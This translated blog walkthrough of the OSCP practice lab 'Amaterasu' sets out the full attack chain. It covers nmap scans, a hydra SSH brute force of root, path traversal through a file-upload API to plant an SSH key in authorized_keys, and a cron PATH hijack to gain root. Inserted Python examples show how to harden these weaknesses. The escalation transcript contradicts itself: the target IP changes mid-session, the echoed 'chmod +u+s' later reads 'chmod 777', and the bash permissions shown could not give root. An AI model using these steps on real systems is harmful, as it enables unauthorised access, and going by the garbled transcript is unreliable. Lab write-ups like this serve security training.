OSCP Lab Walkthrough Series (beginner-friendly) - Easy - Amaterasu

Digest   Other   2023-07-23 12:38   Shanghai

OSCP - Easy difficulty - Amaterasu

Preparation

Start the VPN

Start the target machine

Target confirmation

Get the target machine IP > 192.168.244.249

Use ip a to get the attack machine IP > 192.168.45.168

Port collection - port scan

Collecting the target's open ports

  • Nmap open-port scan, run twice

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# sudo nmap --min-rate 10000 -p- 192.168.244.249
  Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:08 CST
  Nmap scan report for 192.168.244.249
  Host is up (0.26s latency).
  Not shown: 65524 filtered tcp ports (no-response)
  PORT STATE SERVICE
  21/tcp open ftp
  22/tcp closed ssh
  111/tcp closed rpcbind
  139/tcp closed netbios-ssn
  443/tcp closed https
  445/tcp closed microsoft-ds
  2049/tcp closed nfs
  10000/tcp closed snet-sensor-mgmt
  25022/tcp open unknown
  33414/tcp open unknown
  40080/tcp open unknown

[!] Ports collected across the two scans:
21,22,111,139,443,445,2049,10000,25022,33414,40080

Detecting the services behind the target ports

  # tcp probe
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# sudo nmap -sT -sV -O -sC -p21,22,111,139,443,445,2049,10000,25022,33414,40080 192.168.244.249
  Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:12 CST
  Nmap scan report for 192.168.244.249
  Host is up (0.26s latency).
  PORT STATE SERVICE VERSION
  21/tcp open ftp vsftpd 3.0.3
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  |_Can't get directory listing: TIMEOUT
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to 192.168.45.168
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  22/tcp closed ssh
  111/tcp closed rpcbind
  139/tcp closed netbios-ssn
  443/tcp closed https
  445/tcp closed microsoft-ds
  2049/tcp closed nfs
  10000/tcp closed snet-sensor-mgmt
  25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
  | ssh-hostkey:
  |   256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
  |_  256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
  33414/tcp open unknown
  | fingerprint-strings:
  |   GetRequest:
  |     HTTP/1.1 404 NOT FOUND
  |     Server: Werkzeug/2.2.3 Python/3.9.13
  |     Date: Fri, 21 Jul 2023 16:12:42 GMT
  |     Content-Type: text/html; charset=utf-8
  |     Content-Length: 207
  |     Connection: close
  |     <!doctype html>
  |     <html lang=en>
  |     <title>404 Not Found</title>
  40080/tcp open http Apache httpd 2.4.53 ((Fedora))
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Apache/2.4.53 (Fedora)
  |_http-title: My test page



Information gathering - port testing

Overall, 4 ports are open:
21-ftp, 25022-ssh, 33414-tcp, 40080-http
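The two-scan routine above (a full port sweep first, then a targeted -sV/-sC scan on the ports it found) is easy to script. The following is an added example, not code from the original post: a small parser that pulls the port lines out of nmap's normal output and builds the -p argument for the second scan. SAMPLE_SCAN is a constructed copy of the first scan's output above, and the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample: the port lines exactly as the full-range scan on the
# page printed them (nmap "normal" output).
SAMPLE_SCAN = """\
PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    closed ssh
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
2049/tcp  closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open   unknown
33414/tcp open   unknown
40080/tcp open   unknown
"""

# One port line: "<port>/<proto> <state> <service>"; the header and the
# "Not shown:" / "Host is up" lines do not match and are skipped.
PORT_LINE = re.compile(
    r"^(\d{1,5})/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\s+(\S+)"
)


def parse_ports(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, proto, state, service) tuples in the order nmap printed them."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            found.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return found


def open_ports(text: str) -> List[int]:
    """Sorted, de-duplicated list of ports nmap reported as open."""
    return sorted({port for port, _, state, _ in parse_ports(text) if state == "open"})


def port_argument(text: str, include_closed: bool = False) -> str:
    """Build the -p value for the follow-up service scan.

    The post fed every port it saw (open and closed) into the second scan;
    include_closed=True reproduces that, the default keeps only open ones."""
    ports = sorted({port for port, _, state, _ in parse_ports(text)
                    if include_closed or state == "open"})
    return "-p" + ",".join(str(p) for p in ports)


if __name__ == "__main__":
    print(parse_ports(SAMPLE_SCAN))
    print("sudo nmap -sT -sV -O -sC", port_argument(SAMPLE_SCAN), "192.168.244.249")
```

Piping a real scan in (for example `nmap -p- target -oN scan.txt` and then reading scan.txt) is left to the reader; the parser only depends on nmap's normal output format.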

Information gathering on port 21 - FTP

21-FTP version information (confirmed)

The FTP version obtained from the Nmap probe lets us roughly guess where the FTP configuration file lives

  # if the detected version is vsftpd 3.0.3
  cat /etc/vsftpd.conf

21-FTP anonymous login test (present)

Try logging in with the anonymous account and no password

  # connect using the ftp protocol + ip
  ftp 192.168.244.249
  Name: anonymous

21-FTP file collection with GET (failed)

After logging in to FTP, use ls to see which directories exist, and check file permissions while browsing
Download files with GET

  # binary: transfer files in binary mode so they arrive intact
  ftp > binary
  # view the directory structure
  ftp > ls -al

It entered extended mode; there was nothing there

Information gathering on port 25022 - SSH

Target: ssh 192.168.244.249:25022

25022-SSH weak-password brute force (failed)

Try brute-forcing the root account's password with hydra, using 4 threads (-t 4)

  hydra -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.242.249 ssh -t4 -s 25022

Leave the brute force running and move on to the next item

25022-SSH manual login attempt (failed)

After the root password brute force reported an error, try manually

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# ssh root@192.168.242.249 -p 25022
  root@192.168.242.249's password:
  Permission denied, please try again.

Information gathering on port 33414

http://192.168.242.249:33414

According to the nmap probe, 33414 is a TCP service that can be accessed over HTTP

Visiting it shows that it cannot be accessed directly

At this point I asked ChatGPT briefly to find out what Werkzeug is, and decided to run a directory scan

  Werkzeug is a Python WSGI toolkit library used to build web applications and frameworks. Werkzeug provides a flexible set of tools for handling HTTP requests and responses, routing requests, handling sessions, debugging, and so on.

Information gathering - basic dirsearch directory scan

  dirsearch -u http://192.168.242.249:33414 -x 302,403

Found the help and info endpoints

Information gathering - deep dirsearch directory scan (optional)

First check whether the help and info endpoints contain anything; if not, consider leaving a deep scan running

Information gathering - visiting the directories

  • 4 endpoints were found at http://192.168.242.249:33414/help

  0 "GET /info : General Info"
  1 "GET /help : This listing"
  2 "GET /file-list?dir=/tmp : List of the files"
  3 "POST /file-upload : Upload files"

  • Basic information was found at the http://192.168.242.249:33414/info endpoint

Information gathering on port 40080 (optional)

Visiting http://192.168.242.249:40080 shows a Firefox page. Explore 33414 first

Exploitation - getting a webshell

Exploring the /file-list endpoint

File information was found at the endpoint /file-list?dir=/tmp

/tmp is a temporary directory; try changing dir to other directories, and it works

This shows the function can read paths. Tried reading a file; that failed

Exploring the /file-upload endpoint

Confirmed to be an upload function

  curl http://192.168.242.249:33414/file-upload

  # GET is not allowed, so change it to POST
  curl -X POST http://192.168.242.249:33414/file-upload

Asked ChatGPT, and the conclusion was that -F "file=@/path/to/file" is needed

  # create a file
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# touch test.abcd
  # upload
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" http://192.168.242.249:33414/file-upload
  {"message":"No filename part in the request"}

  # No filename part: a filename is required
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" -F filename=a http://192.168.242.249:33414/file-upload
  {"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}

Adjust according to what it asks for

  # the uploaded file name must match the allow-list
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=a.txt http://192.168.242.249:33414/file-upload
  {"message":"File successfully uploaded"}

Checked where the file was uploaded to and found it in the /tmp directory

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl http://192.168.242.249:33414/file-list?dir=/tmp
  ["a.txt",....]

Exploiting the endpoints

If both upload and read exist, what ways are there to exploit them?
The upload could overwrite some file that lets us log in; first confirm whether the upload allows directory traversal

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=../a.txt http://192.168.242.249:33414/file-upload
  <!doctype html>
  <html lang=en>
  <title>500 Internal Server Error</title>
  <h1>Internal Server Error</h1>
  <p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

The error says the request could not be completed, which suggests it tried to write into the root directory and had no permission there

Use the path listing to look for a useful write location; besides tmp there should be places writable with the user's permissions

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl http://192.168.242.249:33414/file-list?dir=/home
  ["alfredo"]
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo
  [".bash_logout",".bash_profile",".bashrc","local.txt",".ssh","restapi",".bash_history"]
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
  ["id_rsa","id_rsa.pub"]

Found a user alfredo with a .ssh folder; try whether that folder accepts uploads

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=/home/alfredo/.ssh/a.txt http://192.168.242.249:33414/file-upload
  {"message":"File successfully uploaded"}
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
  ["id_rsa","id_rsa.pub","a.txt"]

Consider uploading the attack machine's public key as authorized_keys for the alfredo user and logging in over SSH with the key

First generate the key pair on the attack machine

  ssh-keygen -t rsa
  ...
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# ls
  text.txt text.txt.pub

Next, try uploading id_rsa_test.pub at the file upload endpoint,
using the directory traversal to place it at /home/alfredo/.ssh/authorized_keys

  # first change the suffix to one on the allow-list
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# mv text.txt.pub text.txt.txt
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# ls
  hydra.restore text.txt text.txt.txt
  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# curl -X POST -F file="@/home/bachang/Amaterasu/text.txt.txt" -F filename=/home/alfredo/.ssh/authorized_keys http://192.168.242.249:33414/file-upload
  {"message":"File successfully uploaded"}

The file-list endpoint also now lists the public key file we uploaded
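Both endpoints above fail for the same reason: the dir and filename parameters are used as filesystem paths without being confined to the directory the API was meant to expose. The responses also suggest that the allow-list is checked against the name of the uploaded multipart part, while the separate filename field decides where the file is written (an inference from the page's output, not something the page states). The code below is an added example, not the target's own restapi code: vulnerable_target_path reproduces the join behaviour those responses point to (an absolute filename replaces the base directory entirely and '..' walks out of it), and next to it are hardened helpers that keep only the final path component, apply the allow-list to the name actually written, and verify after resolution that the result is still inside the base directory. The constants UPLOAD_DIR, LIST_ROOT and ALLOWED_EXT and all function names are assumptions.

```python
import os
import posixpath

# Assumed constants (not taken from the application's own code)
UPLOAD_DIR = "/tmp"          # the page observed uploads landing in /tmp
LIST_ROOT = "/tmp"           # the only directory the listing should expose
ALLOWED_EXT = {"txt", "pdf", "png", "jpg", "jpeg", "gif"}  # allow-list quoted by the API


def vulnerable_target_path(base: str, filename: str) -> str:
    """The join pattern the page's responses suggest (assumed, not from the app).

    os.path.join discards `base` when `filename` is absolute, and '..'
    segments walk out of it, so the client decides where the file lands."""
    return os.path.normpath(os.path.join(base, filename))


def allowed_extension(name: str) -> bool:
    """Allow-list check on the final component only."""
    return "." in name and name.rsplit(".", 1)[1].lower() in ALLOWED_EXT


def hardened_target_path(base: str, filename: str) -> str:
    """Return the only path an upload called `filename` may be written to,
    or raise ValueError."""
    # 1. keep the final component; any directory part sent by the client is dropped
    name = posixpath.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("empty or special filename")
    # 2. apply the allow-list to the name that will actually be written
    if not allowed_extension(name):
        raise ValueError("extension not allowed")
    # 3. resolve symlinks and confirm the result is still under base
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("path escapes upload directory")
    return target


def hardened_list_target(root: str, requested: str) -> str:
    """Interpret the dir parameter relative to `root` and refuse anything that
    resolves outside it, so neither '/home' nor '../home' can be listed."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("directory outside listing root")
    return candidate


if __name__ == "__main__":
    # The two requests from the page, against both implementations
    for fn in ("../a.txt", "/home/alfredo/.ssh/authorized_keys"):
        print("vulnerable:", fn, "->", vulnerable_target_path(UPLOAD_DIR, fn))
        try:
            print("hardened:  ", fn, "->", hardened_target_path(UPLOAD_DIR, fn))
        except ValueError as err:
            print("hardened:  ", fn, "-> rejected:", err)
```

Inside a Flask view the hardened helpers replace the raw join; the extension check on the multipart part's own filename can stay, but it is the name used for the write that matters, so the check belongs on that. The commonpath test after realpath is what catches symlinks placed inside the upload directory, which a plain string-prefix check would miss.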

Roaming the internal network - getting a shell

SSH key login

With the key in hand, specify it to log in

  ┌──(rootKali)-[/home/bachang/Amaterasu]
  └─# ssh -i text.txt alfredo@192.168.242.249 -p25022
  Last login: Tue Mar 28 03:21:25 2023
  [alfredo@fedora ~]$

Getting FLAG1

  [alfredo@fedora ~]$ find / -name local.txt 2>/dev/null
  /home/alfredo/local.txt
  [alfredo@fedora ~]$ cat /home/alfredo/local.txt
  *****************************************

Privilege escalation

Linux privesc - sudo attempt (none)

Look for files that can be run with sudo without a password

  # find them with sudo -l
  sudo -l

It asks for a password

Linux privesc - suid attempt (none)

  # -perm: file permission bits
  [alfredo@fedora ~]$ find / -perm -u=s -type f 2>/dev/null
  /usr/bin/fusermount
  /usr/bin/chage
  /usr/bin/gpasswd
  /usr/bin/newgrp
  /usr/bin/su
  /usr/bin/mount
  /usr/bin/umount
  /usr/bin/pkexec
  /usr/bin/crontab
  /usr/bin/fusermount3
  /usr/bin/sudo
  /usr/bin/passwd
  /usr/bin/chfn
  /usr/bin/chsh
  /usr/bin/at
  /usr/bin/staprun
  /usr/sbin/grub2-set-bootflag
  /usr/sbin/pam_timestamp_check
  /usr/sbin/unix_chkpwd
  /usr/sbin/mount.nfs
  /usr/lib/polkit-1/polkit-agent-helper-1
  /usr/libexec/cockpit-session

Nothing especially useful for privilege escalation was found

Linux privesc - suid/getcap attempt (none)

  # look for files carrying the CAP_SETUID capability
  [alfredo@fedora ~]$ /usr/sbin/getcap -r / 2>/dev/null
  /usr/bin/newgidmap cap_setgid=ep
  /usr/bin/newuidmap cap_setuid=ep
  /usr/bin/arping cap_net_raw=p
  /usr/bin/clockdiff cap_net_raw=p
  /usr/sbin/suexec cap_setgid,cap_setuid=ep
  /usr/sbin/mtr-packet cap_net_raw=ep

Linux privesc - cron job attempt

/etc/crontab privesc

  # look for scheduled tasks and modify them to escalate
  PATH=/sbin:/bin:/usr/sbin:/usr/bin
  MAILTO=root
  # For details see man 4 crontabs
  # Example of job definition:
  # .---------------- minute (0 - 59)
  # | .------------- hour (0 - 23)
  # | | .---------- day of month (1 - 31)
  # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
  # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
  # | | | | |
  # * * * * * user-name command to be executed
  */1 * * * * root /usr/local/bin/backup-flask.sh

backup-flask.sh is executed once every minute

  # check whether we can modify it
  [alfredo@fedora ~]$ ls -al cat /usr/local/bin/backup-flask.sh
  ls: cannot access 'cat': No such file or directory
  -rwxr-xr-x. 1 root root 106 Mar 28 03:18 /usr/local/bin/backup-flask.sh
  # view the contents
  [alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh
  #!/bin/sh
  export PATH="/home/alfredo/restapi:$PATH"
  cd /home/alfredo/restapi
  tar czf /tmp/flask.tar.gz *

backup-flask.sh puts a directory under the user's home at the front of PATH and then runs tar once
Because that directory is under our user's control, we can make our own tar command and let the scheduled task escalate privileges for us

Could do a reverse shell (failed)
Set the suid bit on bash

  # check bash's permissions
  [alfredo@fedora restapi]$ ls -al /bin/bash
  -rwxr-xr-x. 1 root root 1390080 Jan 25 2021 /bin/bash
  # write a command that escalates bash by adding suid
  [alfredo@fedora restapi]$ echo "chmod +u+s /bin/bash" > tar
  [alfredo@fedora restapi]$ cat tar
  chmod 777 /bin/bash
  # add execute permission
  [alfredo@fedora restapi]$ chmod +x tar
  [alfredo@fedora restapi]$ cat tar
  chmod 777 /bin/bash
  [alfredo@fedora restapi]$ ls -al /bin/bash
  -rwxrwxrwx. 1 root root 1390080 Jan 25 2021
  # privileges successfully escalated
  [alfredo@fedora restapi]$ ls -al /bin/bash
  -rwxrwxrwx. 1 root root 1390080 Jan 25 2021 /bin/bash
  # bash -p to obtain the privileges
  [alfredo@fedora restapi]$ bash -p
  bash-5.1# whoami
  root

The key could also be copied into root's directory for direct passwordless login (lazy)
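The cron weakness above needs two things at once: the root-run script puts a directory the unprivileged user owns at the front of PATH, and it then calls tar by bare name, so PATH lookup finds whatever that user placed there first. The following is an added example, not from the post: an audit function that reads a script, reports PATH entries writable by the user being audited and commands invoked without an absolute path, and a path_hijack_possible verdict that fires only when both are present. VULNERABLE_SCRIPT is a copy of the script the page found; HARDENED_SCRIPT is my own rewrite that pins PATH to system directories and calls /usr/bin/tar by absolute path. The is_writable callback is an assumption that lets the check run on any machine; by default it uses os.access for the current user.

```python
import os
import re
from typing import Callable, List, Tuple

# Copied from the script the page found in /usr/local/bin
VULNERABLE_SCRIPT = """\
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
"""

# Assumed hardened rewrite (not from the page): fixed PATH, absolute tar
HARDENED_SCRIPT = """\
#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/alfredo/restapi || exit 1
/usr/bin/tar czf /tmp/flask.tar.gz .
"""

# "PATH=..." or "export PATH=..." with optional quotes; group 1 is the value
PATH_ASSIGN = re.compile(r'^\s*(?:export\s+)?PATH=["\']?([^"\']*)')

# Shell builtins and keywords that are never resolved through PATH
SHELL_WORDS = {"cd", "exit", "export", "if", "then", "else", "fi", "for", "do",
               "done", "while", "set", "umask", "echo", "true", "false"}

Finding = Tuple[str, str]


def _default_writable(directory: str) -> bool:
    """Assumption: the audit runs as the unprivileged user in question."""
    return os.path.isdir(directory) and os.access(directory, os.W_OK)


def audit_cron_script(text: str,
                      is_writable: Callable[[str], bool] = _default_writable) -> List[Finding]:
    """Report ('writable_path_entry', dir) for every PATH directory the user can
    write to, and ('relative_command', name) for every command not invoked by
    absolute path."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PATH_ASSIGN.match(line)
        if m:
            for entry in m.group(1).split(":"):
                if entry and entry != "$PATH" and is_writable(entry):
                    findings.append(("writable_path_entry", entry))
            continue
        first = line.split()[0]
        if "=" in first and not first.startswith("/"):   # VAR=value prefix, not a command
            continue
        if first in SHELL_WORDS:
            continue
        if not first.startswith("/"):
            findings.append(("relative_command", first))
    return findings


def path_hijack_possible(text: str,
                         is_writable: Callable[[str], bool] = _default_writable) -> bool:
    """True only when a writable PATH entry and a bare command name coexist;
    either one alone is not enough for the lookup to be redirected."""
    kinds = {kind for kind, _ in audit_cron_script(text, is_writable)}
    return {"writable_path_entry", "relative_command"} <= kinds


if __name__ == "__main__":
    # Constructed view of the target: only the user's restapi directory is writable
    only_restapi = lambda d: d == "/home/alfredo/restapi"
    for label, script in (("vulnerable", VULNERABLE_SCRIPT), ("hardened", HARDENED_SCRIPT)):
        print(label, audit_cron_script(script, only_restapi),
              "hijackable:", path_hijack_possible(script, only_restapi))
```

Run with the default callback on a real host (as the user you are auditing for, against each script referenced from /etc/crontab and /etc/cron.d) the function gives a quick triage list; the fix in HARDENED_SCRIPT is the usual one, set PATH explicitly in root's scripts and never prepend user-owned directories to it.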

Getting FLAG2

  bash-5.1# cat /root/proof.txt
  **********************************


云下信安
Tracing it any further would be impolite